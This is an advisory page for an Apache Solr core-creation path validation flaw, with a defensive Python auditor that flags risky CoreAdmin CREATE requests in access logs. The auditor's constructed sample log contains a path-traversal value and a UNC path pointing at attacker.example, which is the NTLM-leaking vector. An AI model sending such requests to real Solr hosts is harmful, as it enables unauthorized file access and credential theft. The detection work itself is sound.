Input Validation Flaw in Apache Solr Affects Core Creation Process
CVE-2026-22444
Key Information:
- Vendor: Apache
- Status: Vendor
- CVE Published: 21 January 2026
What is CVE-2026-22444?
The 'create core' API (CoreAdmin CREATE) in Apache Solr, versions 8.6 through 9.10.0, does not sufficiently validate certain request parameters. A user who can reach the API can point core creation at filesystem locations it was not meant to use, including configuration sets that are accessible to the Solr process but were not intended for that user. On Windows hosts, where UNC paths are supported, a parameter that references a remote share can make the Solr host authenticate to that share and so leak NTLM user hashes. Installations running in standalone mode should restrict the filesystem locations a core may reference with the 'allowPaths' setting and should enable the RuleBasedAuthorizationPlugin so that only authorized users can call the core-admin API. Upgrading to Apache Solr 9.10.1 or later fixes the issue.
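The two risky parameter shapes the advisory describes (a core directory that escapes the allowed roots, and a UNC path on Windows) are easy to spot in request logs. The following auditor is an added example written for this page; it is not code from Apache Solr or from the original advisory. It assumes a Jetty-style access log (the sample lines, client addresses and the host `attacker.example` are constructed), a SOLR_HOME of `/var/solr/data`, and an allow-list rule that only approximates what Solr's `allowPaths` setting enforces.

```python
"""Audit Solr CoreAdmin CREATE requests for path parameters that escape the
allowed filesystem roots.

Added example for this advisory, not code from Apache Solr or from the
original page. The allow-list check approximates the semantics of Solr's
allowPaths setting; the log format is a Jetty-style access log and the
sample lines below are constructed."""
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (hypothetical addresses, host names and requests).
SAMPLE_LOG = """\
10.0.0.5 - - [21/Jan/2026:10:00:01 +0000] "GET /solr/admin/cores?action=CREATE&name=prod&instanceDir=prod&configSet=_default HTTP/1.1" 200 312
10.0.0.9 - - [21/Jan/2026:10:00:02 +0000] "GET /solr/admin/cores?action=CREATE&name=x&instanceDir=..%2F..%2Fetc HTTP/1.1" 400 210
10.0.0.9 - - [21/Jan/2026:10:00:03 +0000] "GET /solr/admin/cores?action=CREATE&name=y&dataDir=%5C%5Cattacker.example%5Cshare HTTP/1.1" 400 210
10.0.0.5 - - [21/Jan/2026:10:00:04 +0000] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 98
"""

# CoreAdmin CREATE parameters that name filesystem locations.
PATH_PARAMS = ("instanceDir", "dataDir", "ulogDir")

LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')
DRIVE_RE = re.compile(r"^[A-Za-z]:/")


def is_unc(path: str) -> bool:
    """True for UNC-style paths (\\\\host\\share). On Windows, resolving such a
    path makes the Solr host authenticate to `host`, which is how NTLM hashes
    leak; the forward-slash form is treated the same, conservatively."""
    return path.startswith(("\\\\", "//"))


def path_allowed(raw: str, solr_home: str, allow_paths) -> bool:
    """Approximation of the allowPaths rule: a path is allowed only if, once
    normalized, it lies under SOLR_HOME or one of the allowed roots.
    UNC paths are always refused here; '*' disables the root check."""
    if is_unc(raw):
        return False
    if "*" in allow_paths:
        return True
    p = raw.replace("\\", "/")
    if not (posixpath.isabs(p) or DRIVE_RE.match(p)):
        p = posixpath.join(solr_home, p)  # relative dirs resolve under SOLR_HOME
    p = posixpath.normpath(p)             # collapses '..' so traversal is visible
    roots = [posixpath.normpath(r.replace("\\", "/")) for r in (solr_home, *allow_paths)]
    return any(p == r or p.startswith(r.rstrip("/") + "/") for r in roots)


def create_requests(log_text: str):
    """Yield (client, params) for every CoreAdmin CREATE call in the log."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/admin/cores"):
            continue
        params = {k: v[0] for k, v in parse_qs(url.query).items()}
        if params.get("action", "").upper() == "CREATE":
            yield client, params


def audit(log_text: str, solr_home: str = "/var/solr/data", allow_paths=()):
    """Return (client, core, param, value, reason) for each offending parameter."""
    findings = []
    for client, params in create_requests(log_text):
        for key in PATH_PARAMS:
            value = params.get(key)
            if value is None or path_allowed(value, solr_home, allow_paths):
                continue
            reason = "UNC path" if is_unc(value) else "outside allowed roots"
            findings.append((client, params.get("name", "?"), key, value, reason))
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_LOG):
        print("client=%s core=%s %s=%r (%s)" % finding)
```

Run against the constructed log, the auditor flags the traversal in request two and the UNC share in request three and passes the first request. The `allow_paths` argument mirrors the `allowPaths` entry in solr.xml (`<str name="allowPaths">${solr.allowPaths:}</str>`); keeping that list tight, and granting the predefined `core-admin-edit` permission only to trusted roles in security.json under the RuleBasedAuthorizationPlugin, is the configuration side of the mitigation the advisory describes.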
Affected Version(s)
Apache Solr 8.6 through 9.10.0 (fixed in 9.10.1)
Exploit Proof of Concept (PoC)
PoC code is written by security researchers to demonstrate that the vulnerability can be exploited. PoC code is also a key component of weaponization, which can lead to real-world attacks such as ransomware.
References
CVSS V3.1
Timeline
- Public PoC available
- Exploit known to exist
- Vulnerability published
- Vulnerability reserved